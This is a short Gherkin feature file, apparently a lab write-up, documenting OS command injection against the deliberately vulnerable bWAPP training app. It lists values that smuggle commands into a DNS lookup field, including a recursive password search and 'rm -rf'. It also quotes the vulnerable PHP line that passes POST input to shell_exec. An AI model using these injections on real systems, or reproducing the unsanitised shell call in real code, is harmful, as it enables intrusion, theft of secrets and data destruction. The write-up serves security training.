# language: en

Feature: Detect and exploit vuln OS Command Injection
  From the bWAPP application
  From the A1 - Injection category
  With Low security level

  Background:
    Given I am running Manjaro GNU/Linux kernel 4.9.77-1-MANJARO
    And I am browsing in Firefox 57.0.4
    And I am runing bWAPP from docker container raesene/bwapp
    Given a PHP site with an input that says "DNS lookup: _______ -> Lookup"
    And the URL is bwapp/commandi.php
    And the goal is to inject UNIX commands into PHP code

  Scenario Outline: Inject OS commands
    When I leave the input's default value "www.nsa.gov"
    Then nothing happens
    When I append ;<command> to "www.nsa.gov" in the input
    Then the <output> is rendered in the browser

    Examples:
      | <command>          | <output>                                        |
      | ls -lR /           | list all files in server root                   |
      | grep -r password / | looks for all ocurrences of "password" in /     |
      | rm -rf             | nothing                                         |
      | vi                 | other pages don't load! server & docker crashed |

  Scenario: Static detection
    When I look in the code
    Then I see the called function invokes 'shell_exec("nslookup  ")'
    """
    echo "<p>" . shell_exec("nslookup  " . $_POST["target"]) . "</p>";
    """
    And any OS command can be therefored appended with ; or &
